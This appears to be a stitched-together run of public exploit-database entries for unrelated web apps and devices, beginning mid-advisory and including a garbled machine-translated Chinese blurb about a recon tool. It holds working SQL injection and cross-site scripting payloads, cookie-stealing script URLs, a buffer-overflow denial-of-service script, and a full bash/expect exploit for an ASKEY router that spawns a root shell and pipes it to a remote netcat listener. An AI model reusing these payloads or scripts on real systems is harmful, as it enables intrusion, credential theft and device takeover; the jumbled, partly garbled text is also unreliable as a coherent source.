There are a number of places to inject code and have it run by a user or an admin. These include but are not limited to the following. Injection vulnerabilities exist in forums.asp When posting a new message, script can be injected into the Title and into the message form fields. This is especially dangerous because the latest messages are posted on the main page of the website, therefore affecting all users. An Injection vulnerability exists in submit.asp. A malicious user can submit script instead of a link to be added to the website. This vuln affects the administrator when he prepares to accept or deny submissions. Injection vulnerabilities are present in the profile section of the website. By submitting script into the for fields of upd_user.asp (the profile update form) it will be run whenever someone views the affected profile.(user_public.asp) The form fields that are vulnerable are First Name, Last Name and Country. This vuln exists in all three of the previously mentioned ASP APP scripts.
Plaintext Password Storage Weakness:
The username and password for the logged in user are stored as plaintext in the cookie, making cookie theft through an xss vuln even more dangerous. Also, a malicious admin can view a users password in plaintext by visiting the user administration page, and viewing the HTML source of a user. The users password will then be presented in plaintext. This vuln exists in all three of the previously mentioned ASP APP scripts.
Solution:
The vendor plans on releasing a new version of these products at the end of the month to supposedly correct all of the security issues mentioned above.
Credits:
James Bercegay And parag0d of the GulfTech Security Research Team.
# Exploit Title: ASP.NET jVideo Kit - 'query' SQL Injection
# Dork: N/A
# Date: 23.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: MediaSoft Pro
# Vendor Homepage: https://www.mediasoftpro.com/video-sharing-script/mvc/
# Version: v1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'query' parameter. You can use the GET or POST
methods.
====================================================
# PoC : SQLi :
# GET : http://test.com/search?query=[SQL]
# POST : http://test.com/search
POST /search HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.com/login
Cookie: ASP.NET_SessionId=wxim4xkwgxvhtu5k3pvevc3o;
__RequestVerificationToken=iuu_Y6Xm3aOzaKj3EfCyE_-eT-Ff_lRdBMBZzyFRszSTGdNcaY2w5pH7ck0WZ2egIX3R18UlpXkr8pe_kxw6Ic2g1M-Cmz4woLsU6RRMV3M1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Query=test
# Vulnerable Payload :
Parameter: query (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: query=test%' AND 3923=3923 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause (IN)
Payload: query=test%' AND 1603 IN (SELECT
(CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN
(1603=1603) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND '%'='
====================================================
source: https://www.securityfocus.com/bid/49667/info
ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin
----------------------------------------------------------------------------------------------------------
# Exploit Title: ASLDRService ATK Hotkey- Privilege Escalation Unquoted Service Path
# Date: 13/10/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: www.asus.com
# Version: 1.0.69.0
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
The application suffers from an unquoted service path issue impacting the service 'ASLDRService' deployed as part of ATK Hotkey
This could potentially allow an authorized but non-privileged local user to execute arbitrary code witystem privileges on the system.
POC :
C:\Users\Utilisateur>sc qc ASLDRService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: ASLDRService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe
LOAD_ORDER_GROUP : ShellSvcGroup
TAG : 0
DISPLAY_NAME : ASLDR Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Additional notes :
https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu
# Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation
# Date: 07-12-2022
# Exploit Author: Leonardo Nicolas Servalli
# Vendor Homepage: www.askey.com
# Platform: ASKEY router devices RTF3505VW-N1
# Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7
# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md
#Description:
#----------
# Mitrastar ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).
# The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using “;/bin/bash” as injected string we can spawn a busybox/ash console.
#Exploit:
#--------
#!/usr/bin/bash
if [ -z "$@" ]; then
echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell "
exit 0
fi
for K in $(seq 1 15) # Attemps
do
echo "**************************************************************************************"
echo "******************************** Attempt number $K ************************************"
echo "**************************************************************************************"
for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 & # start a background loop injecting the string ";/bin/bash" on the port 80 of the router
# Expect script for interact with the router through SSH, login, launch the tcpdump with the option "-z sh", and finally launch a more stable busybox reverse shell to our listener
/usr/bin/expect << EOD
spawn ssh $2@$1
expect {
"password: " {
send "$3\r"
expect ">"
send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r" # filter by source port 8888
}
"yes/no" {
send "yes\r"
#exp_continue
}
}
set timeout 2
expect {
timeout {
puts "Timeout..."
send "exit\r"
exit 0
}
"*usy*ox" {
expect "#"
send "rm /tmp/runme* \r"
send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r"
puts "Rooted !!!!!!!!!"
set timeout -1
expect "NEVER_APPEARING_STRING#" # wait an infinite time to mantain the rverse shell open
}
}
EOD
done
# Exploit Title: Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 19, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/ask-expert-script/
# Tested Version: 3.0.5
# Tested on: Kali linux, Windows 8.1
# PoC:
# Cross Site Scripting:
# http://localhost/[PATH]/categorysearch.php?cateid=[XSS]
# http://localhost/[PATH]/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>
# SQL Injection:
# http://localhost/[PATH]/list-details.php?view=[SQL]
# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 03.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
Request: http://localhost/[PATH]/index.php?cat=1&exp=&shop=1
Vulnerable Parameter: shop (GET)
Payload: cat=1&exp=&shop=-5438') UNION ALL SELECT
CONCAT(0x71786b6a71,0x6357557777645143654a726369774c4167665278634a46617758614d66506b46434f4b7669565054,0x716a787671),NULL--
fmIb
# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 08.04.2019
# Exploit Author: Doğukan Karaciğer
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Lastest
# Tested on: Ubuntu-trusty-64
# CVE: N/A
----- PoC: SQLi -----
Request: http://localhost/[PATH]/admin/bannedcustomers.php
Parameter: blacklistitemid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blacklistitem=1&deletebutton=Delete&blacklistitemid=1 AND (SELECT
* FROM (SELECT(SLEEP(5)))MGvE)
source: https://www.securityfocus.com/bid/50616/info
AShop is prone to multiple open-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible.
Versions prior to AShop 5.1.4 are vulnerable.
IE8
http://www.example.com/ashop/?'"<script>alert(document.cookie)</script>
http://www.example.com/ashop/index.php?'"<script>alert(document.cookie)</script>
http://www.example.com/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns="
http://www.example.com/ashop/index.php?language='"<script>alert(document.cookie)</script>
FF 7.1
http://www.example.com/ashop/index.php?searchstring=1&showresult=true&exp='"</script><script>alert(666);</script>&resultpage=&categories=off&msg=&search=index.php&shop=1
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage='"</script><script>alert(document.cookie)</script>&msg=
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg='"</script><script>alert(document.cookie)</script>
http://www.example.com/ashop/basket.php?cat=0&sid='"</script><script>alert(document.cookie)</script>&shop=1&payoption=3
Open Redirection
http://www.example.com/ashop/language.php?language=sv&redirect=http://www.google.com
http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com
http://www.example.com/ashop/currency.php?redirect=http://www.google.com
侦察是渗透测试的第一阶段,这意味着在计划进行任何真实攻击之前收集信息,因此Ashok是一种令人难以置信的快速侦察工具,用于渗透测试仪,该工具是专门为侦察'title='Reconnaissance'Recneconsance阶段而设计的。在Ashok-V1.1中,您可以找到高级的Google Dorker和Wayback爬网机。
主要功能
- Wayback爬行机机器
- Google Dorking无限制
- github信息抓取
- 子域标识符
-CMS/Technology Tactecter带定制标头
安装
〜GIT克隆https://GITHUB.COM/ANKITDOBHAL/ASHOK
〜CD Ashok
〜Python3.7 -M PIP3 Install -R Euncess.txt
如何使用Ashok?
详细用法指南可在Wiki的使用部分上找到。
但是一些选项索引在:以下给出
Extract Http Headers from single url Dump internet-archive machine with json output for single url Google dorking using number of results as dorknumber Dns Lookup of single target domain Subdomain Lookup of single target domain Port Scan using nmap of single target domain Extract data using Github username of target Detect Cms of target url
docker
Ashok can be launched using a lightweight Python3.8-Alpine Docker图像。
$ docker pull powerexploit/ashok-v1.2
$ docker集装箱运行- it powerexploit/ashok-v1.2--Help
信用
HackerTarget
source: https://www.securityfocus.com/bid/50167/info
asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected.
http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt>
# Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version: 2021.6.2
# Tested on: Windows 10 Home x64
# STEPS
# Open the program aSc Timetables 2021
# In File select the option New
# Put any letter in the fiel Name of the Schooland click Next
# In the next Windows click NEXT
# In the Step 3, in Subject click in New
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Metoo.txt"
# Paste the content in the field Subject title
# Click in OK
# End :)
buffer = 'Z' * 10000
try:
file = open("Metoo.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")